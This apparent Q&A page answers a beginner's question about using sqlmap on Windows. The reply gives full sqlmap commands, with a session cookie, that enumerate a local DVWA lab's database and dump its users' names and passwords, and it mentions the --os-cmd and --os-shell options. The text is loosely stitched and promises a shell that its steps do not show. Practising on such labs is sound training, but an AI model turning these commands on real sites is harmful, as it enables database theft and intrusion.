Python在windows上电脑上下载了,sqlmap好不容易下载了我想用但是不会
好像打错字了
#:运行任意操作系统的命令
--os-cmd
--os-shell
更多内容请看
以下是使用sqlmap获取shell的步骤和方法:
首先确保你已经在Windows电脑上成功下载并安装了Python和sqlmap。
打开DVWA,并在输入框中提交一些数据,然后使用Burp Suite等抓包工具获取提交的数据信息以及cookie信息。
打开命令提示符(CMD)窗口,输入以下命令以获取当前数据库的版本和数据库名:
python sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=1or6kpckk0o78pebjhgh99qfa9" --current-db
python sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=1or6kpckk0o78pebjhgh99qfa9" -D dvwa --tables
python sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=1or6kpckk0o78pebjhgh99qfa9" -D dvwa -T users --columns
python sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=1or6kpckk0o78pebjhgh99qfa9" -D dvwa -T users -C user,password --dump
这样就可以获取到我们想要的数据。